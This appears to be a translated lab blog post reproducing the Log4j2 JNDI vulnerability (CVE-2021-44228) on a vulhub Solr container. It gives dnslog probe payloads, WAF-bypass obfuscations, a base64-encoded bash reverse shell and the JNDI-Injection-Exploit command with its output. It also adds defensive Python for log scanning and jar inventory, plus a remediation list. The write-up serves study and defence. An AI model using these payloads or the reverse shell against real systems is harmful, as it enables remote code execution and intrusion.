[vulhub] Log4j2: CVE-2021-44228 vulnerability reproduction

References for this reproduction: https://www.freebuf.com/vuls/329984.html, https://cloud.tencent.com/developer/article/1944751, https://mp.weixin.qq.com/s/15zcLEk6_x2enszhim9afA.

Principle

Apache Log4j is an open-source Apache project, and Apache Log4j2 is a Java-based logging tool. It rewrites the Log4j framework and introduces many rich features. We can control where log information is delivered: the console, files, GUI components, etc. By defining the level of each log message, we can control the log generation process in more detail. The logging framework is widely used in business system development to record log information. The vulnerability lies in its lookup feature: when a logged string contains a ${jndi:...} lookup, Log4j2 resolves it through JNDI, which can fetch and load a class from a remote server.

Affected versions

Apache Log4j 2.x <= 2.14.1

PoC [I don't understand this for now; let's leave it for later]

${jndi:ldap://xxx.dnslog.cn/poc}

WAF bypass

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxx.dnslog.cn/poc}
${${::-j}ndi:rmi://xxx.dnslog.cn/poc}
${jndi:rmi://xxx.dnslog.cn/poc}
${${lower:jndi}:${lower:rmi}://xxx.dnslog.cn/poc}
${${lower:${lower:jndi}}:${lower:rmi}://xxx.dnslog.cn/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.dnslog.cn/poc}

RCE exploitation

Target machine ------ http://192.168.88.128:8080/.

Setting up the lab environment

Range: vulhub
Start the range:
Because my Ubuntu machine already has vulhub-master downloaded, I can enter the corresponding folder and start it to complete the local setup.

ubuntu-gan@ubuntugan-virtual-machine:~$ cd  vulhub-master/log4j/CVE-2021-44228
ubuntu-gan@ubuntugan-virtual-machine:~/vulhub-master/log4j/CVE-2021-44228$  docker-compose up -d
Creating network "cve-2021-44228_default" with the default driver
Pulling solr (vulhub/solr:8.11.0)...
8.11.0: Pulling from vulhub/solr
43c265008fae: Already exists
af36d2c7a48: Already exists
2b7b4d10e1c1: Already exists
f264389d8f2f: Already exists
1a2c46e93f4a: Already exists
f9506bb322c0: Already exists
96f5dad14c2c: Already exists
c387eff49cc3: Pull complete
Digest: sha256:84255b20a2d134fc97bbb0fab7cb826087098ee594fcbc94c3a71def24d31003
Status: Downloaded newer image for vulhub/solr:8.11.0
Creating cve-2021-44228_solr_1 ... done

The exposed port is 8983.

After it starts successfully, visit: http://192.168.88.128:8983/.
Then visit: http://192.168.88.128:8983/solr/admin/cores?action=1. [Question: How did they know to visit this URL?]
Supplementary answer to "How did they know to visit this URL?": http://www.ctfiot.com/16640.html#fancybox-14 (Log4j2 Vulnerability Exploration, Part 1: Apache Solr Remote Command Execution).
According to the official documentation, we can learn the parameters of the Collections API call. We can imagine JNDI injection through the controllable Collections parameters. The path is:

/solr/admin/collections?action=xxxxx

Vulnerability determination

Using dnslog

First visit http://dnslog.cn/ to get a temporary domain name.

Then use the obtained temporary domain name to construct the payload and access it directly: http://192.168.88.128:8983/solr/admin/cores?action=${jndi:ldap://olorvf.dnslog.cn}.
[What does this payload mean?]

After the visit, go back to the dnslog.cn page and click the Refresh button; we can see that there is a request record, which indicates that the Log4j2 vulnerability exists. [I have used different browsers, and also accessed it with the browser that comes with Ubuntu.]
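The dnslog probe above and the obfuscated forms listed in the WAF bypass section are what a defender's log search has to recognise. The following Python is an added example (not code from the original post or from vulhub): it URL-decodes a request line, collapses the lower:/upper:/default-value lookups into the text they resolve to, and then looks for a ${jndi: lookup in the result. The log lines are constructed Solr-style access-log samples with example.invalid as a stand-in host; no real request log is used.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no nested "$", "{" or "}" inside.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately look for after de-obfuscation.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Resolve the obfuscation-only lookups seen in the bypass list.

    Returns the replacement text, or None when the lookup must be kept
    literally (the jndi: lookup itself, or anything we do not understand)."""
    if ":-" in body:                         # ${name:-default} -> default, covers ${::-j}
        name, default = body.split(":-", 1)
        if name.strip().lower().startswith("jndi:"):
            return None                      # a real jndi lookup with a default; keep it
        return default
    head = body.lower()
    if head.startswith("lower:"):            # ${lower:JNDI} -> jndi
        return body[len("lower:"):].lower()
    if head.startswith("upper:"):            # ${upper:jndi} -> JNDI
        return body[len("upper:"):].upper()
    return None


def normalize(text: str, max_rounds: int = 32) -> str:
    """Repeatedly collapse innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        def repl(m):
            r = _resolve(m.group(1))
            return m.group(0) if r is None else r
        new_text = INNER_LOOKUP.sub(repl, text)
        if new_text == text:
            break
        text = new_text
    return text


def is_log4shell_probe(text: str) -> bool:
    """True if the (possibly URL-encoded, possibly obfuscated) text carries a ${jndi: lookup."""
    decoded = unquote(unquote(text))         # handles single and double URL-encoding
    return JNDI_LOOKUP.search(normalize(decoded)) is not None


# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG_LINES = [
    '192.0.2.10 - - [13/Sep/2022:21:55:01 +0800] "GET /solr/admin/cores?action=${jndi:ldap://example.invalid/poc} HTTP/1.1" 200 311',
    '192.0.2.10 - - [13/Sep/2022:21:55:02 +0800] "GET /solr/admin/cores?action=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fexample.invalid%2Fpoc%7D HTTP/1.1" 200 311',
    '192.0.2.10 - - [13/Sep/2022:21:55:03 +0800] "GET /solr/admin/cores?action=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://example.invalid/poc} HTTP/1.1" 200 311',
    '192.0.2.11 - - [13/Sep/2022:21:55:04 +0800] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 2200',
    '192.0.2.12 - - [13/Sep/2022:21:55:05 +0800] "GET /solr/select?q=${date:yyyy} HTTP/1.1" 200 50',
]


def scan(lines):
    """Return (1-based line number, line) for every line that looks like a Log4Shell probe."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: {line}")
```

The normaliser only understands the three obfuscation lookups that appear on this page (default value, lower, upper); other lookups are left in place and are not flagged, so a hit means "suspicious lookup present", not "the target was exploited". Outbound LDAP/RMI connections from the Solr host, as seen on the dnslog page, remain the stronger signal.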

Exploit

Kali attacker machine: 192.168.88.129.

JNDI injection tool

Download address: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0.
Download the corresponding jar package. Copy the jar package to the Kali virtual machine, or download it directly in Kali [because I can't copy from the host to Kali, I downloaded it in Kali's Firefox browser].
Use the JNDI injection tool JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar.

Construct the payload:

bash -i > /dev/tcp/192.168.88.129/6969 0>&1

Execute in Kali: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguODguMTI5LzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.88.129

Got the RMI and LDAP parameters:

┌──(kaligan㉿studygan)-[~/Downloads]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguODguMTI5LzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.88.129
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[ADDRESS] >> 192.168.88.129
[COMMAND] >> bash -c  {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguODguMTI5LzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}
----------------------------JNDI Links---------------------------- 
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.88.129:1099/5ftwug
ldap://192.168.88.129:1389/5ftwug
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.88.129:1099/ggds3d
ldap://192.168.88.129:1389/ggds3d
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.88.129:1099/xrvhnp

----------------------------Server Log----------------------------
2022-09-13 21:53:33 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2022-09-13 21:53:33 [RMISERVER]  >> Listening on 0.0.0.0:1099
2022-09-13 21:53:34 [LDAPSERVER] >> Listening on 0.0.0.0:1389



Listening port

Then open nc on the Kali attacker machine to listen on port 6969: [Why listen on 6969? Can other ports be used? ----- I understand this now. It should be related to the earlier bash payload; if that is changed, the listening port can be changed to match.]

nc -lvnp 6969

Access the payload in the browser

Payload: http://192.168.88.128:8983/solr/admin/cores?action=${jndi:rmi://192.168.88.129:1099/5ftwug}

Then I found that Kali had received the connection and could execute shell commands.

Close the range

Develop a good habit and remember to shut it down after use: docker-compose down.

ubuntu-gan@ubuntugan-virtual-machine:~/vulhub-master/log4j/CVE-2021-44228$ docker-compose down
Stopping cve-2021-44228_solr_1 ... done
Removing cve-2021-44228_solr_1 ... done
Removing network cve-2021-44228_default

Remediation

 1. Upgrade to the latest version.
 2. Set the JVM parameter "-Dlog4j2.formatMsgNoLookups=true".
 3. Set the system environment variable "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS" to "true".
 4. Disable the application's outbound network connections.
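Step 1 (upgrade) only helps if you can find every copy of log4j-core on a host, so the following Python is an added example (not from the original post or from vulhub) of an inventory check for it. It walks a directory tree for log4j-core-*.jar, reads Implementation-Version from the jar manifest (falling back to the file name), compares it with the affected range stated above (2.x <= 2.14.1), and also reports whether the JndiLookup class is still inside the jar; that class path is Log4j's real one, and removing it from the jar was Apache's own stop-gap mitigation, which this page does not list. The jars it scans in demo() are constructed stand-ins written to a temporary directory (manifest plus an empty marker entry, not real class files).

```python
import re
import tempfile
import zipfile
from pathlib import Path

MAX_AFFECTED = (2, 14, 1)   # page: Apache Log4j 2.x <= 2.14.1
# Class that implements the ${jndi:...} lookup in log4j-core.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparsable -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def read_manifest_version(jar):
    """Implementation-Version from META-INF/MANIFEST.MF, or None if absent."""
    try:
        manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
    return m.group(1) if m else None


def inspect_jar(path):
    path = Path(path)
    with zipfile.ZipFile(path) as jar:
        version = read_manifest_version(jar)
        if version is None:  # fall back to the file name, e.g. log4j-core-2.14.1.jar
            m = re.search(r"log4j-core-([\d.]+)", path.name)
            version = m.group(1) if m else ""
        has_jndi_lookup = JNDI_LOOKUP_CLASS in jar.namelist()
    v = parse_version(version)
    in_affected_range = v is not None and v[0] == 2 and v <= MAX_AFFECTED
    return {
        "path": str(path),
        "version": version or "unknown",
        "jndi_lookup_present": has_jndi_lookup,
        # Affected version AND the lookup class still shipped -> needs action.
        "vulnerable": in_affected_range and has_jndi_lookup,
    }


def scan_tree(root):
    """Inspect every log4j-core-*.jar below root."""
    return [inspect_jar(p) for p in sorted(Path(root).rglob("log4j-core-*.jar"))]


def make_fake_jar(directory, version, include_jndi_lookup):
    """Constructed stand-in for a log4j-core jar: manifest plus an empty marker entry."""
    path = Path(directory) / f"log4j-core-{version}.jar"
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")
    return path


def demo():
    """Build three constructed jars and return (version, class present, vulnerable) per jar."""
    with tempfile.TemporaryDirectory() as root:
        make_fake_jar(Path(root) / "app-a" / "lib", "2.14.1", True)   # affected, class present
        make_fake_jar(Path(root) / "app-b" / "lib", "2.14.1", False)  # affected, class removed
        make_fake_jar(Path(root) / "app-c" / "lib", "2.17.1", True)   # outside the page's range
        results = scan_tree(root)
    return sorted((r["version"], r["jndi_lookup_present"], r["vulnerable"]) for r in results)


if __name__ == "__main__":
    for row in demo():
        print(row)
```

For a real host, call scan_tree("/") or the application directories instead of demo(); shaded or "fat" jars that embed log4j-core under another name are not matched by the file-name glob, so treat a clean result as "nothing found", not "nothing present".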

Origin blog.csdn.net/weixin_49422491/article/details/126841176